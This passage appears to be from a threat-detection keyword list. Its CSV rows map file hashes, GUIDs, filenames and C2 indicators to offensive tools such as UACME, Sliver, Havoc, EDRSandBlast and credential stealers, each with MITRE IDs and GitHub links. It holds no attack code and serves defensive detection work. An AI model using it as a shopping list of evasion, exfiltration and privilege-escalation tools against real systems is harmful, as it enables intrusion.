Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*21582b3a68e8753322a1b1c7e550ae7fd305de4935de68fbde9f87570f484d00*,offensive_tool_keyword,WDExtract,Extract Windows Defender database from vdm files and unpack it,T1059 - T1005 - T1119,TA0002 - TA0009 - TA0003,N/A,N/A,Defense Evasion,https://github.com/hfiref0x/WDExtract/,1,0,N/A,8,4,347,56,2020-02-10T06:53:43Z,2019-04-19T17:33:48Z -*215a9f9095e89c79b342aed5625bbc6d660b910cd15a06ac4a072e8860c3e2c6*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*22A156EA-2623-45C7-8E50-E864D9FC44D3*,offensive_tool_keyword,SharpView,C# implementation of harmj0y's PowerView,T1018 - T1482 - T1087.002 - T1069.002,TA0007 - TA0003 - TA0001,N/A,N/A,Discovery,https://github.com/tevora-threat/SharpView/,1,0,N/A,10,9,850,206,2021-12-17T15:53:20Z,2018-07-24T21:15:04Z -*23975ac9-f51c-443a-8318-db006fd83100*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*23A2E629-DC9D-46EA-8B5A-F1D60566EA09*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*23af06a7987966a7e51336b3cdd33b411fa05778ec14179a50a60fa0f6aee1af*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*23E06BF12C5BE7641EF89F557C3F6600E1F3881F8DCE7279C2112279E7EC3B988E1A85EC350149007DE78CE5566FCBD18F630D2CDB78C76AA06F2B121F0B3701*,offensive_tool_keyword,combine_harvester,Rust in-memory dumper,T1055 - T1055.001 - T1055.012,TA0005 - TA0006,N/A,N/A,Defense Evasion,https://github.com/m3f157O/combine_harvester,1,0,N/A,10,2,101,17,2023-07-26T07:16:00Z,2023-07-20T07:37:51Z -*2419CEDC-BF3A-4D8D-98F7-6403415BEEA4*,offensive_tool_keyword,PipeViewer ,A tool that shows detailed information about named pipes in Windows,T1022.002 - T1056.002,TA0005 - TA0009,N/A,N/A,discovery,https://github.com/cyberark/PipeViewer,1,0,N/A,5,5,453,33,2023-08-23T09:34:06Z,2022-12-22T12:35:34Z -*261f880e-4bee-428d-9f64-c29292002c19*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,0,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*27159b8ff67d3f8e6c7fdb4b57b9f57f899bdfedf92cf10276269245c6f4e066*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*273987ab3fcc9a7e9976a73ff8c6986e6e397fc3b9f179ce23991814f694a843*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*27b89ba25c1620f7f46af4a239d6a18b71b9b689ea33eb7ab099e0b039cdf21f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*282383cd8223cd0d36f4bf09501830ae1dd01aacaf483e9e95fa4938345453b7*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*29446C11-A1A5-47F6-B418-0D699C6C3339*,offensive_tool_keyword,GithubC2,Github as C2,T1095 - T1071.001,TA0011,N/A,N/A,C2,https://github.com/TheD1rkMtr/GithubC2,1,0,N/A,10,10,115,29,2023-08-02T02:26:05Z,2023-02-15T00:50:59Z -*2944dbfc-8a1e-4759-a8a2-e4568950601d*,offensive_tool_keyword,o365enum,Enumerate valid usernames from Office 365 using ActiveSync - Autodiscover v1 or office.com login page.,T1595 - T1595.002 - T1114 - T1114.001 - T1087 - T1087.002,TA0040 - TA0010 - TA0007,N/A,N/A,Exploitation tools,https://github.com/gremwell/o365enum,1,0,N/A,7,3,212,40,2021-04-23T14:40:52Z,2020-02-18T12:22:50Z -*2963C954-7B1E-47F5-B4FA-2FC1F0D56AEA*,offensive_tool_keyword,SharpStay,SharpStay - .NET Persistence,T1031 - T1053 - T1059 - T1060 - T1063 - T1120 - T1123,TA0003 - TA0008 - TA0011,N/A,N/A,POST Exploitation tools,https://github.com/0xthirteen/SharpStay,1,0,N/A,10,5,416,95,2022-09-12T15:39:58Z,2020-01-24T22:22:07Z -*2a08385892845104b4f07d693ca395eba3a09e4aa89ad791be3807919316ed67*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*2a63a2c3f43afb1f3fb091ffa71bd4d67b64e6d0b220e97057542883bce246f5*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*2a67c7690ec6df8e233207116b0e4fe76c02ae43595d9e606e123572b6ac88a1*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*2aa21c51a100de781b6647b04bb0371a6205a7b1dc22a3eeae058ec4cb80fd5f*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*2CFB9E9E-479D-4E23-9A8E-18C92E06B731*,offensive_tool_keyword,NoFilter,Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.,T1548 - T1548.002 - T1055 - T1055.004,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/deepinstinct/NoFilter,1,0,N/A,9,3,257,42,2023-08-20T07:12:01Z,2023-07-30T09:25:38Z -*2D863D7A-A369-419C-B4B3-54BDB88B5816*,offensive_tool_keyword,UsoDllLoader,This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading exploit ,T1210.001 - T1055 - T1574.001,TA0007 - TA0002 - TA0001,N/A,N/A,Exploitation tools,https://github.com/itm4n/UsoDllLoader,1,0,N/A,N/A,4,368,104,2020-06-06T11:05:12Z,2019-08-01T17:58:16Z -*2e64396f0b5cc2f6e59f5d329ffbb1ef0e6dd5e0547bd6fff5567f72cca6ace9*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*2ee6204d65c00011c64b84383bfd8a3dc04149ff681df8ee86acbbea4ba73aa1*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*2john.c,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*2john.lua*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*2john.pl*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*304D5A8A-EF98-4E21-8F4D-91E66E0BECAC*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*3058dea6894b1ca7bcff8896b35080c0ddfa1c541e7e505792cbac65dea9d0d9*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*30f7ba049eab00673ae6b247199ec4f6af533d9ba46482159668fd23f484bdc6*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*33BF8AA2-18DE-4ED9-9613-A4118CBFC32A*,offensive_tool_keyword,RunAsWinTcb,RunAsWinTcb uses an userland exploit to run a DLL with a protection level of WinTcb-Light.,T1073.002 - T1055.001 - T1055.002,TA0005 - TA0002,N/A,N/A,Defense Evasion,https://github.com/tastypepperoni/RunAsWinTcb,1,0,N/A,10,2,119,16,2022-08-02T16:35:50Z,2022-07-29T16:36:06Z -*365-Stealer.py*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,1,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -*365-Stealer-master*,offensive_tool_keyword,365-Stealer,365-Stealer is a phishing simualtion tool written in python3. It can be used to execute Illicit Consent Grant Attack,T1111 - T1566.001 - T1078.004,TA0004 - TA0001 - TA0040,N/A,N/A,Phishing,https://github.com/AlteredSecurity/365-Stealer,1,1,N/A,10,3,288,74,2023-06-15T19:56:12Z,2020-09-20T18:22:36Z -*36EBF9AA-2F37-4F1D-A2F1-F2A45DEEAF21*,offensive_tool_keyword,PowerShdll,Run PowerShell with dlls only Does not require access to powershell.exe as it uses powershell automation dlls. PowerShdll can be run with: rundll32.exe. installutil.exe. regsvcs.exe. regasm.exe. regsvr32.exe or as a standalone executable.,T1059 - T1218 - T1216 - T1053 - T1118,TA0002 - TA0008 - TA0003,N/A,N/A,Defense Evasion,https://github.com/p3nt4/PowerShdll,1,0,N/A,N/A,10,1649,263,2021-03-17T02:02:23Z,2016-07-15T00:08:32Z -*36F9C306-5F45-4946-A259-610C05BD90DF*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,0,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*375D8508-F60D-4E24-9DF6-1E591D2FA474*,offensive_tool_keyword,DebugAmsi,DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.,T1562.001 - T1050.005,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/MzHmO/DebugAmsi,1,0,N/A,10,1,71,17,2023-09-18T17:17:26Z,2023-08-28T07:32:54Z -*38ea755e162c55ef70f9506dddfd01641fc838926af9c43eda652da63c67058b*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,0,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z -*3A2FCB56-01A3-41B3-BDAA-B25F45784B23*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*3b5cbf0dddc3ef7e3af7d783baef315bf47be6ce11ff83455a2165befe6711f5*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,0,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*3bb553cd-0a48-402d-9812-8daff60ac628*,offensive_tool_keyword,SharpExfiltrate,Modular C# framework to exfiltrate loot over secure and trusted channels.,T1027 - T1567 - T1561,TA0010 - TA0040 - TA0005,N/A,N/A,Data Exfiltration,https://github.com/Flangvik/SharpExfiltrate,1,0,N/A,10,2,116,26,2021-09-12T17:08:02Z,2021-09-08T13:17:00Z -*3BEF8A16-981F-4C65-8AE7-C612B46BE446*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*3C601672-7389-42B2-B5C9-059846E1DA88*,offensive_tool_keyword,TakeMyRDP,A keystroke logger targeting the Remote Desktop Protocol (RDP) related processes,T1056.001 - T1021.001 - T1057,TA0002 - TA0003 - TA0007,N/A,N/A,Exploitation Tools,https://github.com/TheD1rkMtr/TakeMyRDP,1,0,N/A,N/A,3,278,56,2023-08-02T02:23:28Z,2023-07-02T17:25:33Z -*3ECA4B56CE358B13E1128A1E6149ED07CA0A8C55997B50A1E2C4EA46BD586B84*,offensive_tool_keyword,ADACLScanner,A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .,T1222 - T1069 - T1018,TA0002 - TA0007 - TA0043,N/A,N/A,AD Enumeration,https://github.com/canix1/ADACLScanner,1,0,N/A,7,9,809,151,2023-09-12T21:35:21Z,2017-04-06T12:28:37Z -*3f399d7d08d61d4ab7d5188e893b0f2a06b5a5a00f0ce00db2d234463280540c*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*3fa76458e017f2d04544d809a7be81e180c3132ad2254279812e27d5d20ce97e*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*3fd21b20d00000021c43d21b21b43d41226dd5dfc615dd4a96265559485910*,offensive_tool_keyword,sliver,Sliver is an open source cross-platform adversary emulation/red team framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002,TA0002 - TA0003 - TA0006 - TA0009,N/A,N/A,C2,https://github.com/BishopFox/sliver,1,0,N/A,10,10,6596,920,2023-10-03T20:36:09Z,2019-01-17T22:07:38Z -*3fd21b20d00000021c43d21b21b43de0a012c76cf078b8d06f4620c2286f5e*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*3kom-superhack.txt*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*3snake-master*,offensive_tool_keyword,3snake,Tool for extracting information from newly spawned processes,T1003 - T1110 - T1552 - T1505,TA0001 - TA0002 - TA0003,N/A,N/A,Credential Access,https://github.com/blendin/3snake,1,1,N/A,7,7,688,113,2022-02-14T17:42:10Z,2018-02-07T21:03:15Z -*4.5.6.7:1337*,offensive_tool_keyword,Slackor,A Golang implant that uses Slack as a command and control server,T1059.003 - T1071.004 - T1562.001,TA0002 - TA0010 - TA0011,N/A,N/A,C2,https://github.com/Coalfire-Research/Slackor,1,1,N/A,10,10,451,108,2023-02-25T03:35:15Z,2019-06-18T16:01:37Z -*40056/service-endpoint*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,1,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*40B05F26-6A2F-40BC-88DE-F40D4BC77FB0*,offensive_tool_keyword,NtRemoteLoad,Remote Shellcode Injector,T1055 - T1027 - T1218.010,TA0002 - TA0005 - TA0010,N/A,N/A,Exploitation tool,https://github.com/florylsk/NtRemoteLoad,1,0,N/A,10,2,173,35,2023-08-27T17:14:44Z,2023-08-27T16:52:31Z -*40E7714F-460D-4CA6-9A5A-FB32C6769BE4*,offensive_tool_keyword,Fuck-Etw,Bypass the Event Trace Windows(ETW) and unhook ntdll.,T1070.004 - T1055.001,TA0005 - TA0003,N/A,N/A,Defense Evasion,https://github.com/unkvolism/Fuck-Etw,1,0,N/A,10,1,63,9,2023-09-29T21:19:10Z,2023-09-25T18:59:10Z -*421ccf38c0f8216c69a74bb9f0ff4a08dae88c02958829c104198b9bca715bcb*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*4390571ef12a934fbfc0191b789a48c8e61f690ba930f4659f3960e4ec22706a*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*43BB3C30-39D7-4B6B-972E-1E2B94D4D53A*,offensive_tool_keyword,SharpShellPipe,interactive remote shell access via named pipes and the SMB protocol.,T1056.002 - T1021.002 - T1059.001,TA0005 - TA0009 - TA0002,N/A,N/A,Lateral movement,https://github.com/DarkCoderSc/SharpShellPipe,1,0,N/A,8,1,97,14,2023-08-27T13:12:39Z,2023-08-25T15:18:30Z -*-443.devtunnels.ms*,greyware_tool_keyword,dev-tunnels,Dev tunnels allow developers to securely share local web services across the internet. Enabling you to connect your local development environment with cloud services and share work in progress with colleagues or aid in building webhooks,T1021.003 - T1105 - T1090,TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/overview,1,1,N/A,8,10,N/A,N/A,N/A,N/A -*443D8CBF-899C-4C22-B4F6-B7AC202D4E37*,offensive_tool_keyword,SharpHide,Tool to create hidden registry keys,T1112 - T1562 - T1562.001,TA0005 - TA0003,N/A,N/A,Persistence,https://github.com/outflanknl/SharpHide,1,0,N/A,9,5,445,95,2019-10-23T10:44:22Z,2019-10-20T14:25:47Z -*44626fa65358f14a41bbc8c850b482f61eb64e1e0636df93320d1cca6caa0483*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*4479c31a428b0672245b2eff026be202998a4f146ab90cd06ce44412a20bf462*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*449CE476-7B27-47F5-B09C-570788A2F261*,offensive_tool_keyword,PrivFu,Kernel mode WinDbg extension and PoCs for token privilege investigation.,T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001,TA0007 - TA0008 - TA0002 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/daem0nc0re/PrivFu/,1,0,N/A,10,6,575,94,2023-10-02T03:31:07Z,2021-12-28T13:14:25Z -*44c2e8c3e25b9d75d319a256eaaca3d195d789209a6491795696b5e33b142513*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*45D748AC-9B16-426E-808D-94662B0417F7*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*46ce4d9e34f8845b17c5a9b87891b5ace6dca83427377029ee1d06af5af6d637*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*47c05b996b2831e39c05190b62fb25558a8a05173eb4b5f5b263b841e0bed3f2*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*48da9c5487412fa708a6d7fb753a238a9258fd1bad88d564ad07178d278a7b8d*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*497CA37F-506C-46CD-9B8D-F9BB0DA34B95*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*49d94561eee009acc25c36857bb0260dd8d8a38e6cdf0286a49463d90724b9b1*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*4a548ba1be4de75a03af674d670ff10375700a18babc7cb3a4d1406045e2df04*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z -*4aa24c1115cc3ed71027f760c7564357c162a09de58d75b5e9037cd869fb2a8a*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z 